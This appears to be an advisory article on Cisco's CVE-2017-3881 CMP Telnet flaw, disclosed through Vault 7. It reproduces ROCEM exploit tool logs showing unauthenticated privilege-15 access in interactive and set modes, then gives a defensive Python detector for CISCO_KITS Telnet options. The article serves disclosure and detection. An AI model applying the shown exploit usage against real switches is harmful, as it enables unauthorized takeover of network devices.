On March 17, 2017, Cisco's official website announced that the Cluster Management Protocol (CMP) in Cisco IOS and IOS XE Software contains a remote code execution vulnerability, CVE-2017-3881.
Cisco discovered the vulnerability while studying the leaked CIA documents known as "Vault 7". An attacker can cause an unauthorized reload of an affected device or execute code on it without authorization. The vulnerability has two root causes: CMP-specific Telnet options are not restricted to communication between members of the local cluster but are accepted on any Telnet connection to an affected device, and malformed CMP-specific Telnet options are handled incorrectly. An attacker who opens a Telnet connection to an affected device and sends malformed CMP-specific Telnet options while negotiating that connection can remotely execute arbitrary code and take complete control of the device, or cause the device to reload.
At the time of writing, Cisco has not released a fix for the Cluster Management Protocol remote code execution vulnerability CVE-2017-3881.
The Vault 7 documents disclose the test procedure for this remote code execution vulnerability. The tool is not used from source code; it is launched in either Interactive mode or Set mode. Interactive mode sends the payload over Telnet and immediately gives the attacker a command shell in the context of the same Telnet connection:
Started ROCEM interactive session - successful:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254
[+] Validating data/interactive.bin
[+] Validating data/set.bin
[+] Validating data/transfer.bin
[+] Validating data/unset.bin
Image: c3560-ipbase-mz.122-35.SE5
Host: 192.168.0.254
Action: Interactive
Proceed? (y/n)y
Trying 127.0.0.1...
[*] Attempting connection to host 192.168.0.254:23
Connected to 127.0.0.1.
Escape character is '^]'.
[+] Connection established
[*] Starting the interactive session
User Access Verification
Password:
MLS-Sth#
MLS-Sth# show priv
The Current privilege level is 15
MLS-Sth#show users
Line User Host(s) Idle Location
Set mode modifies the switch's memory in preparation for subsequent unauthenticated Telnet connections:
Test set/unset feature of ROCEM
The DUT is configured with the target configuration and network setup
The DUT is accessed by hopping through three flux nodes as per the CONOP
Reloaded the DUT to start with a clean device
From Adverse ICON machine, set ROCEM:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254
[+] Validating data/interactive.bin
[+] Validating data/set.bin
[+] Validating data/transfer.bin
[+] Validating data/unset.bin
Image: c3560-ipbase-mz.122-35.SE5
Host: 192.168.0.254
Action: Set
Proceed? (y/n)y
[*] Attempting connection to host 192.168.0.254:23
[+] Connection established
[*] Sending Protocol Step 1
[*] Sending Protocol Step 2
[+] Done
root@debian:/home/user1/ops/adverse/adverse-1r/rocem#
Verified I could telnet and rx priv 15 without creds:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254
Trying 192.168.0.254...
Connected to 192.168.0.254.
Escape character is '^]'.
MLS-Sth#
MLS-Sth#show priv
The Current privilege level is 15
MLS-Sth#
While studying this vulnerability, we found one piece of information that was useful to us: the telnet debug output.
Note the last line, which shows the CISCO_KITS option being received; this confirms that the string is significant.
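The CISCO_KITS marker noted above is what a defender can key on. The following is an added example, not code from the article, from Cisco or from the Vault 7 tooling: it walks a captured Telnet byte stream, pulls out every subnegotiation (IAC SB ... IAC SE framing per RFC 854, with IAC IAC escaping), reports any that carry CISCO_KITS, and raises an alert when such an option arrives from a host that is not a known cluster member, which is the restriction the article says affected devices fail to enforce. The sample streams, the option code placeholder and the cluster allowlist are constructed for the demonstration; the real CMP option code is not given on this page.

```python
"""Added example: detect CMP-specific Telnet options (CISCO_KITS) in a captured
Telnet stream and flag them when they come from outside the cluster.
Telnet framing follows RFC 854; all sample data below is constructed."""

IAC, SB, SE = 0xFF, 0xFA, 0xF0   # RFC 854 command bytes
CMP_MARKER = b"CISCO_KITS"        # string the article points to in the debug output


def extract_subnegotiations(stream: bytes) -> list:
    """Return the payload of every IAC SB ... IAC SE block in `stream`.

    Inside a subnegotiation a literal 0xFF is sent as IAC IAC, so that pair is
    collapsed to one byte. A block cut off by end of stream, or by an IAC that is
    followed by anything other than IAC or SE, is returned as far as it got,
    because a malformed CMP option is exactly what a defender wants to see.
    """
    subs, i, n = [], 0, len(stream)
    while i < n:
        if stream[i] != IAC or i + 1 >= n or stream[i + 1] != SB:
            i += 1
            continue
        i += 2                      # skip IAC SB
        body = bytearray()
        while i < n:
            b = stream[i]
            if b != IAC:
                body.append(b)
                i += 1
                continue
            nxt = stream[i + 1] if i + 1 < n else None
            if nxt == IAC:          # escaped literal 0xFF
                body.append(IAC)
                i += 2
                continue
            if nxt == SE:           # normal terminator: consume IAC SE
                i += 2
            break                   # terminated or malformed: end this block
        subs.append(bytes(body))
    return subs


def find_cmp_options(stream: bytes) -> list:
    """Subnegotiations that contain the CISCO_KITS marker."""
    return [s for s in extract_subnegotiations(stream) if CMP_MARKER in s]


def assess_session(src_ip: str, stream: bytes, cluster_members) -> str:
    """Classify one Telnet session from `src_ip` to a switch's port 23.

    CMP options are only expected between members of the local cluster, so the
    allowlist is the defender's side of the check the device itself lacks.
    """
    if not find_cmp_options(stream):
        return "clean"
    if src_ip in cluster_members:
        return "cmp-option-from-cluster-member"
    return "alert: CMP Telnet option from non-cluster host %s" % src_ip


# Constructed sample streams (not real captures).
SAMPLE_BENIGN = (bytes([IAC, 0xFB, 0x18])                       # WILL TERMINAL-TYPE
                 + bytes([IAC, SB, 0x18, 0x00]) + b"VT100" + bytes([IAC, SE]))
CMP_OPTION_PLACEHOLDER = 0x7F   # placeholder only; the real option code is not on this page
SAMPLE_SUSPECT = (bytes([IAC, 0xFB, 0x18])
                  + bytes([IAC, SB, CMP_OPTION_PLACEHOLDER]) + CMP_MARKER
                  + bytes([IAC, IAC]) + b"\x01"                  # escaped 0xFF, then a data byte
                  + bytes([IAC, SE]))
CLUSTER_MEMBERS = {"10.0.0.2", "10.0.0.3"}                      # constructed allowlist

if __name__ == "__main__":
    for ip, stream in (("10.0.0.9", SAMPLE_BENIGN),
                       ("10.0.0.9", SAMPLE_SUSPECT),
                       ("10.0.0.2", SAMPLE_SUSPECT)):
        print(ip, "->", assess_session(ip, stream, CLUSTER_MEMBERS))
```

Run the script as-is to see the three verdicts; in practice the stream would come from a packet capture or a Telnet proxy in front of the switch, and the allowlist from the cluster configuration. The parser deliberately keeps truncated or badly terminated blocks rather than discarding them, since the advisory's second root cause is incorrect handling of malformed CMP options.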
According to the advisory Cisco has published so far, a total of 318 products are affected by this vulnerability; for the detailed product list, see the Appendix.
Currently, only the following two categories of products are not affected by this vulnerability:
Products running Cisco IOS Software that are not on the list of affected devices.
Products running Cisco IOS XE Software that do not include the CMP protocol subsystem.
Detection method for CVE-2017-3881